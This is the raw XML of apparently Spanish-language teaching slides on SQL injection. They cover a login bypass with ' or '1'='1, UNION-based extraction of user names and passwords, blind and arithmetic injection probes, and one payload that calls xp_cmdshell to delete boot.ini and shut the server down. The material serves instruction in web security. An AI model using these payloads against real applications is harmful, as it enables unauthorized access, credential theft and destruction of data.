              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Saltar restricciones de acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Elevación de privilegios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Extracción de información de la Base de Datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Parada de SGBDR.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ejecución de comandos en contexto usuario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>bd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> dentro del servidor.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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Básico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713" y="3519488"/>
            <a:ext cx="7027862" cy="2460625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Select idusuario from tabla_usuarios where nombre_usuario=‘$usuario’ and clave=‘$clave’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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255838" y="1460500"/>
            <a:ext cx="4464050" cy="1584325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB26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2616200" y="1676400"/>
            <a:ext cx="1223963" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB26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s-ES"/>
              <a:t>Usuario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37894" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2616200" y="2324100"/>
            <a:ext cx="1223963" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB26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s-ES"/>
              <a:t>Clave</a:t>
            </a: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3911600" y="1747838"/>
            <a:ext cx="2520950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3911600" y="2324100"/>
            <a:ext cx="252095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400">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128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3913188" y="1749425"/>
            <a:ext cx="252095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ES"/>
              <a:t>Administrador</a:t>
            </a:r>
            <a:endParaRPr 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3913188" y="2325688"/>
            <a:ext cx="2520950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ES" sz="2400">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>‘ or ‘1’=‘1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1003300" y="3519488"/>
            <a:ext cx="7027863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8600" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="33557C"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>idusuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tabla_usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nombre_usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Administrador</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’ and clave =‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> ‘1’=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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  <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="2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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Básico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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.  Listado de información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01713" y="1487488"/>
            <a:ext cx="7027862" cy="4937125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Acceso a información con proceso de listado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.miweb.com/prog.asp?parametro1=hola</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>http://www.miweb.com/prog.asp?parametro1=1</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ataque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>http://www.miweb.com/prog.asp?parametro1=‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> nombre, clave,1,1,1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>tabla_usuarios</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>; otra instrucción; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>(“del c:\boot.ini”); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>http://www.miweb.com/prog.asp?parametro1=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> .....; otra instrucción; --</a:t>
            </a:r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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. Listado de Información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/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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La aplicación Web no muestra ningún mensaje de error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>La aplicación no procesa nuestros comandos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> titulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> tabla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param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se inyecta comandos y se busca hacer preguntas de Verdad o Mentira</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>http://server/miphp.php?id=1 and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>http://server/miphp.php?id=1 and 1=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-E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MITO III: Con SSL y mi Firewall estoy a salvo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13315" name="Picture 4" descr="url_missi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750" y="1338263"/>
            <a:ext cx="8512175" cy="436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/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1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000" dirty="0"/>
              <a:t>¿Como reconocer un falso?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Da un código de error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Da una página de error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Cambia el hash de la firma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Cambia el árbol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Tarda más en responder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s-ES" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>Si la página reacciona de forma diferente a la Verdad y a la Mentira, entonces podemos extraer datos haciendo búsquedas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>http://server/miphp.php?id=1 and 300&gt;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>(username,1,1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>all_users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0" err="1"/>
              <a:t>rownum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2000" dirty="0"/>
              <a:t>&lt;=1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="es-E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/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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SQL Injection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los entornos donde no es posible utilizar los operadores lógicos “and “y “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” , una alternativa es utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>arithmetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Arithmetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> consiste en construir una lógica booleana de extracción de datos utilizando operaciones matemáticas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>División por 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>id=1-(0/(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(name,1,1))-99 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>sysusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
            <a:endParaRPr lang="es-E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SQL Injection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Desbordamiento de tipo de datos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>id=1-((99/(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> top 1 ASCII(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(name,1,1)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>sysusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>))*(99999999999999999*9999999999999999999))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Sumas y restas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>Id=1-(-(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>(name,1,1)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>sysusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0" err="1"/>
              <a:t>asc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" i="1" dirty="0"/>
              <a:t>))-99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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/>
              <a:t>Arithmetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Injection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Acceso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ficheros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Dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>posibilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
